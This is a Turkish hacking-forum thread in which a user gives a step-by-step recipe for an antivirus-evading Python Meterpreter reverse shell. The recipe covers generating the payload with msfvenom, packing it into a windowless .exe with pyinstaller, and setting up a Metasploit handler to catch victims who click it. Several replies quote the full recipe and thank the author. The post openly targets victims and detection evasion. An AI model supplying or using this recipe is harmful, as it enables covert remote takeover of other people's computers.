Meterpreter Python Undetected Methodu

z3n

z3n

Üye
26 Kas 2023
157
94
Bildiğimiz üzere msfencoderler çoğu antivirus tarafından biliniyor

Ben ise bugün sizlere daha basit ve daha işe yarayan bir taktik vericem.

Yapmamız gereken Metasploit-Framework içinde Bulunan Msfvenom ile "python/meterpreter/reverse_tcp" bir payload oluşturuyoruz.

204jj6g.gif


Kod: 
msfvenom -p python/meterpereter/reverse_tcp LHOST=LOCAL_IP_ADRESINIZ LPORT=MODEM_PORTUNUZ -f py -o "Kaydedilecek yer"
Sonra oluşan .py payload dosyamız oluşacaktır.

Şimdi ise .py dosyasını Windows işletim sisteminde çalışabilmesi için .exe uzantısına çevirmemiz lazım
Bunun için "pyinstaller" Kurmamız lazım.Python yazılımının içindeki pip ile indirebilirsiniz


Kod: 
pip install pyinstaller
Sonrasında pyinstaller kullanarak .exe çevirebiliriz.


Kod: 
pyinstaller --onefile --noconsole -w payloadınızınadı.py
Böylece Encrypt edilmiş payloadınız olacaktır.
Kurbanlarınızı avlamak için ise metasploit-frameworkdan


Kod: 
use exploit/multi/handler


Kod: 
set payload python/meterpreter/reverse_tcp


Kod: 
set LHOST IP'niz


Kod: 
set LPORT MODEM_PORTUNUZ


Kod: 
exploit
Bu Komutları Kullandıktan sonra Payloadınıza tıklayan avlarınızı Metasploit-Frameworkun Yardımı ile çeşitli şekilde sömürebilirsiniz.

Konunun çoğu kısmı alıntıdır. Ayrıca python dosyanızı kriptolayarak sonra pyinstallerden geçirirseniz yakalanma düzeyi azalacaktır. Scan sonuçlarını da atıyorum. Zaten sadece hiç kullanılmayan antivirusler anlıyor rat olduğunu. Umarım beğenirsiniz...

sc5qd1u.jpg
 
Butcherb3y

Butcherb3y

Uzman üye
1 Eyl 2022
1,593
1,185
Anıtkabir
z3n' Alıntı:
Bildiğimiz üzere msfencoderler çoğu antivirus tarafından biliniyor

Ben ise bugün sizlere daha basit ve daha işe yarayan bir taktik vericem.

Yapmamız gereken Metasploit-Framework içinde Bulunan Msfvenom ile "python/meterpreter/reverse_tcp" bir payload oluşturuyoruz.

204jj6g.gif


Kod: 
msfvenom -p python/meterpereter/reverse_tcp LHOST=LOCAL_IP_ADRESINIZ LPORT=MODEM_PORTUNUZ -f py -o "Kaydedilecek yer"
Sonra oluşan .py payload dosyamız oluşacaktır.

Şimdi ise .py dosyasını Windows işletim sisteminde çalışabilmesi için .exe uzantısına çevirmemiz lazım
Bunun için "pyinstaller" Kurmamız lazım.Python yazılımının içindeki pip ile indirebilirsiniz


Kod: 
pip install pyinstaller
Sonrasında pyinstaller kullanarak .exe çevirebiliriz.


Kod: 
pyinstaller --onefile --noconsole -w payloadınızınadı.py
Böylece Encrypt edilmiş payloadınız olacaktır.
Kurbanlarınızı avlamak için ise metasploit-frameworkdan


Kod: 
use exploit/multi/handler


Kod: 
set payload python/meterpreter/reverse_tcp


Kod: 
set LHOST IP'niz


Kod: 
set LPORT MODEM_PORTUNUZ


Kod: 
exploit
Bu Komutları Kullandıktan sonra Payloadınıza tıklayan avlarınızı Metasploit-Frameworkun Yardımı ile çeşitli şekilde sömürebilirsiniz.

Konunun çoğu kısmı alıntıdır. Ayrıca python dosyanızı kriptolayarak sonra pyinstallerden geçirirseniz yakalanma düzeyi azalacaktır. Scan sonuçlarını da atıyorum. Zaten sadece hiç kullanılmayan antivirusler anlıyor rat olduğunu. Umarım beğenirsiniz...

sc5qd1u.jpg
Genişletmek için tıkla ...
Elinize sağlık
 
ancients123

ancients123

Uzman üye
9 Nis 2016
1,723
338
Eline sağlık , bozulup bozulmadığını test ettikten sonra konuyu güncellerseniz herkes yararlanır
 
Xmongpro2706

Xmongpro2706

Yeni üye
2 Ağu 2023
29
7
z3n' Alıntı:
Bildiğimiz üzere msfencoderler çoğu antivirus tarafından biliniyor

Ben ise bugün sizlere daha basit ve daha işe yarayan bir taktik vericem.

Yapmamız gereken Metasploit-Framework içinde Bulunan Msfvenom ile "python/meterpreter/reverse_tcp" bir payload oluşturuyoruz.

204jj6g.gif


Kod: 
msfvenom -p python/meterpereter/reverse_tcp LHOST=LOCAL_IP_ADRESINIZ LPORT=MODEM_PORTUNUZ -f py -o "Kaydedilecek yer"
Sonra oluşan .py payload dosyamız oluşacaktır.

Şimdi ise .py dosyasını Windows işletim sisteminde çalışabilmesi için .exe uzantısına çevirmemiz lazım
Bunun için "pyinstaller" Kurmamız lazım.Python yazılımının içindeki pip ile indirebilirsiniz


Kod: 
pip install pyinstaller
Sonrasında pyinstaller kullanarak .exe çevirebiliriz.


Kod: 
pyinstaller --onefile --noconsole -w payloadınızınadı.py
Böylece Encrypt edilmiş payloadınız olacaktır.
Kurbanlarınızı avlamak için ise metasploit-frameworkdan


Kod: 
use exploit/multi/handler


Kod: 
set payload python/meterpreter/reverse_tcp


Kod: 
set LHOST IP'niz


Kod: 
set LPORT MODEM_PORTUNUZ


Kod: 
exploit
Bu Komutları Kullandıktan sonra Payloadınıza tıklayan avlarınızı Metasploit-Frameworkun Yardımı ile çeşitli şekilde sömürebilirsiniz.

Konunun çoğu kısmı alıntıdır. Ayrıca python dosyanızı kriptolayarak sonra pyinstallerden geçirirseniz yakalanma düzeyi azalacaktır. Scan sonuçlarını da atıyorum. Zaten sadece hiç kullanılmayan antivirusler anlıyor rat olduğunu. Umarım beğenirsiniz...

sc5qd1u.jpg
Genişletmek için tıkla ...
eline sağlık
 
sasorii

sasorii

Asistan Moderatör
2 Mar 2023
211
97
nijerya
z3n' Alıntı:
Bildiğimiz üzere msfencoderler çoğu antivirus tarafından biliniyor

Ben ise bugün sizlere daha basit ve daha işe yarayan bir taktik vericem.

Yapmamız gereken Metasploit-Framework içinde Bulunan Msfvenom ile "python/meterpreter/reverse_tcp" bir payload oluşturuyoruz.

204jj6g.gif


Kod: 
msfvenom -p python/meterpereter/reverse_tcp LHOST=LOCAL_IP_ADRESINIZ LPORT=MODEM_PORTUNUZ -f py -o "Kaydedilecek yer"
Sonra oluşan .py payload dosyamız oluşacaktır.

Şimdi ise .py dosyasını Windows işletim sisteminde çalışabilmesi için .exe uzantısına çevirmemiz lazım
Bunun için "pyinstaller" Kurmamız lazım.Python yazılımının içindeki pip ile indirebilirsiniz


Kod: 
pip install pyinstaller
Sonrasında pyinstaller kullanarak .exe çevirebiliriz.


Kod: 
pyinstaller --onefile --noconsole -w payloadınızınadı.py
Böylece Encrypt edilmiş payloadınız olacaktır.
Kurbanlarınızı avlamak için ise metasploit-frameworkdan


Kod: 
use exploit/multi/handler


Kod: 
set payload python/meterpreter/reverse_tcp


Kod: 
set LHOST IP'niz


Kod: 
set LPORT MODEM_PORTUNUZ


Kod: 
exploit
Bu Komutları Kullandıktan sonra Payloadınıza tıklayan avlarınızı Metasploit-Frameworkun Yardımı ile çeşitli şekilde sömürebilirsiniz.

Konunun çoğu kısmı alıntıdır. Ayrıca python dosyanızı kriptolayarak sonra pyinstallerden geçirirseniz yakalanma düzeyi azalacaktır. Scan sonuçlarını da atıyorum. Zaten sadece hiç kullanılmayan antivirusler anlıyor rat olduğunu. Umarım beğenirsiniz...

sc5qd1u.jpg
Genişletmek için tıkla ...
Çok iyi elinize sağlık deneyeceğim
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.